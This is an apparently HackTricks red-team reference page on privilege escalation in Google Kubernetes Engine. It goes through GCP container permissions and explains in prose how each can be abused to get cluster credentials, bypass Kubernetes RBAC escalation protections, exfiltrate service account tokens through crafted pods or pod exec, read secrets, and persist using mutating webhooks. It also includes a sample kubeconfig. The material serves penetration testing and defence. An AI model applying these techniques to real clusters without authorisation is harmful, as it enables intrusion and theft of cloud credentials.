GCP - Container Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

container

container.clusters.get

This permission allows to gather credentials for the Kubernetes cluster using something like:

gcloud container clusters get-credentials <cluster_name> --zone <zone>

Without extra permissions, the credentials are pretty basic as you can just list some resource, but hey are useful to find miss-configurations in the environment.

Note that kubernetes clusters might be configured to be private, that will disallow that access to the Kube-API server from the Internet.

If you don't have this permission you can still access the cluster, but you need to create your own kubectl config file with the clusters info. A new generated one looks like this:

apiVersion: v1
clusters:
- cluster:
    certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUVMRENDQXBTZ0F3SUJBZ0lRRzNaQmJTSVlzeVRPR1FYODRyNDF3REFOQmdrcWhraUc5dzBCQVFzRkFEQXYKTVMwd0t3WURWUVFERXlRMk9UQXhZVEZoWlMweE56ZGxMVFF5TkdZdE9HVmhOaTAzWVdFM01qVmhNR05tTkdFdwpJQmNOTWpJeE1qQTBNakl4T1RJMFdoZ1BNakExTWpFeE1qWXlNekU1TWpSYU1DOHhMVEFyQmdOVkJBTVRKRFk1Ck1ERmhNV0ZsTFRFM04yVXROREkwWmkwNFpXRTJMVGRoWVRjeU5XRXdZMlkwWVRDQ0FhSXdEUVlKS29aSWh2Y04KQVFFQkJRQURnZ0dQQURDQ0FZb0NnZ0dCQU00TWhGemJ3Y3VEQXhiNGt5WndrNEdGNXRHaTZmb0pydExUWkI4Rgo5TDM4a2V2SUVWTHpqVmtoSklpNllnSHg4SytBUHl4RHJQaEhXMk5PczFNMmpyUXJLSHV6M0dXUEtRUmtUWElRClBoMy9MMDVtbURwRGxQK3hKdzI2SFFqdkE2Zy84MFNLakZjRXdKRVhZbkNMMy8yaFBFMzdxN3hZbktwTWdKVWYKVnoxOVhwNEhvbURvOEhUN2JXUTJKWTVESVZPTWNpbDhkdDZQd3FUYmlLNjJoQzNRTHozNzNIbFZxaiszNy90RgpmMmVwUUdFOG90a0VVOFlHQ3FsRTdzaVllWEFqbUQ4bFZENVc5dk1RNXJ0TW8vRHBTVGNxRVZUSzJQWk1rc0hyCmMwbGVPTS9LeXhnaS93TlBRdW5oQ2hnRUJIZTVzRmNxdmRLQ1pmUFovZVI1Qk0vc0w1WFNmTE9sWWJLa2xFL1YKNFBLNHRMVmpiYVg1VU9zMUZIVXMrL3IyL1BKQ2hJTkRaVTV2VjU0L1c5NWk4RnJZaUpEYUVGN0pveXJvUGNuMwpmTmNjQ2x1eGpOY1NsZ01ISGZKRzZqb0FXLzB0b2U3ek05RHlQOFh3NW44Zm5lQm5aVTFnYXNKREZIYVlZbXpGCitoQzFETmVaWXNibWNxOGVPVG9LOFBKRjZ3SURBUUFCbzBJd1FEQU9CZ05WSFE4QkFmOEVCQU1DQWdRd0R3WUQKVlIwVEFRSC9CQVV3QXdFQi96QWRCZ05WSFE0RUZnUVU5UkhvQXlxY3RWSDVIcmhQZ1BjYzF6Sm9kWFV3RFFZSgpLb1pJaHZjTkFRRUxCUUFEZ2dHQkFLbnp3VEx0QlJBVE1KRVB4TlBNbmU2UUNqZDJZTDgxcC9oeVc1eWpYb2w5CllkMTRRNFVlVUJJVXI0QmJadzl0LzRBQ3ZlYUttVENaRCswZ2wyNXVzNzB3VlFvZCtleVhEK2I1RFBwUUR3Z1gKbkJLcFFCY1NEMkpvZ29tT3M3U1lPdWVQUHNrODVvdWEwREpXLytQRkY1WU5ublc3Z1VLT2hNZEtKcnhuYUVGZAprVVl1TVdPT0d4U29qVndmNUsyOVNCbGJ5YXhDNS9tOWkxSUtXV2piWnZPN0s4TTlYLytkcDVSMVJobDZOSVNqCi91SmQ3TDF2R0crSjNlSjZneGs4U2g2L28yRnhxZWFNdDladWw4MFk4STBZaGxXVmlnSFMwZmVBUU1NSzUrNzkKNmozOWtTZHFBYlhPaUVOMzduOWp2dVlNN1ZvQzlNUk1oYUNyQVNhR2ZqWEhtQThCdlIyQW5iQThTVGpQKzlSMQp6VWRpK3dsZ0V4bnFvVFpBcUVHRktuUTlQcjZDaDYvR0xWWStqYXhuR3lyUHFPYlpNZTVXUDFOUGs4NkxHSlhCCjc1elFvanEyRUpxanBNSjgxT0gzSkxOeXRTdmt4UDFwYklxTzV4QUV0OWxRMjh4N28vbnRuaWh1WmR6M0lCRU8KODdjMDdPRGxYNUJQd0hIdzZtKzZjUT09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
    server: https://34.123.141.28
  name: gke_security-devbox_us-central1_autopilot-cluster-1
contexts:
- context:
    cluster: gke_security-devbox_us-central1_autopilot-cluster-1
    user: gke_security-devbox_us-central1_autopilot-cluster-1
  name: gke_security-devbox_us-central1_autopilot-cluster-1
current-context: gke_security-devbox_us-central1_autopilot-cluster-1
kind: Config
preferences: {}
users:
- name: gke_security-devbox_us-central1_autopilot-cluster-1
  user:
    auth-provider:
      config:
        access-token: <access token>
        cmd-args: config config-helper --format=json
        cmd-path: gcloud
        expiry: "2022-12-06T01:13:11Z"
        expiry-key: '{.credential.token_expiry}'
        token-key: '{.credential.access_token}'
      name: gcp

container.roles.escalate | container.clusterRoles.escalate

Kubernetes by default prevents principals from being able to create or update Roles and ClusterRoles with more permissions that the ones the principal has. However, a GCP principal with that permissions will be able to create/update Roles/ClusterRoles with more permissions that ones he held, effectively bypassing the Kubernetes protection against this behaviour.

container.roles.create and/or container.roles.update OR container.clusterRoles.create and/or container.clusterRoles.update respectively are also necessary to perform those privilege escalation actions.

container.roles.bind | container.clusterRoles.bind

Kubernetes by default prevents principals from being able to create or update RoleBindings and ClusterRoleBindings to give more permissions that the ones the principal has. However, a GCP principal with that permissions will be able to create/update RolesBindings/ClusterRolesBindings with more permissions that ones he has, effectively bypassing the Kubernetes protection against this behaviour.

container.roleBindings.create and/or container.roleBindings.update OR container.clusterRoleBindings.create and/or container.clusterRoleBindings.update respectively are also necessary to perform those privilege escalation actions.

container.cronJobs.create | container.cronJobs.update | container.daemonSets.create | container.daemonSets.update | container.deployments.create | container.deployments.update | container.jobs.create | container.jobs.update | container.pods.create | container.pods.update | container.replicaSets.create | container.replicaSets.update | container.replicationControllers.create | container.replicationControllers.update | container.scheduledJobs.create | container.scheduledJobs.update | container.statefulSets.create | container.statefulSets.update

All these permissions are going to allow you to create or update a resource where you can define a pod. Defining a pod you can specify the SA that is going to be attached and the image that is going to be run, therefore you can run an image that is going to exfiltrate the token of the SA to your server allowing you to escalate to any service account. For more information check:

As we are in a GCP environment, you will also be able to get the nodepool GCP SA from the metadata service and escalate privileges in GCP (by default the compute SA is used).

container.secrets.get | container.secrets.list

As explained in this page, with these permissions you can read the tokens of all the SAs of kubernetes, so you can escalate to them.

container.pods.exec

With this permission you will be able to exec into pods, which gives you access to all the Kubernetes SAs running in pods to escalate privileges within K8s, but also you will be able to steal the GCP Service Account of the NodePool, escalating privileges in GCP.

container.pods.portForward

As explained in this page, with these permissions you can access local services running in pods that might allow you to escalate privileges in Kubernetes (and in GCP if somehow you manage to talk to the metadata service).

container.serviceAccounts.createToken

Because of the name of the permission, it looks like that it will allow you to generate tokens of the K8s Service Accounts, so you will be able to privesc to any SA inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it.

container.mutatingWebhookConfigurations.create | container.mutatingWebhookConfigurations.update

These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to persist in the cluster. For more information follow this link.

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Last updated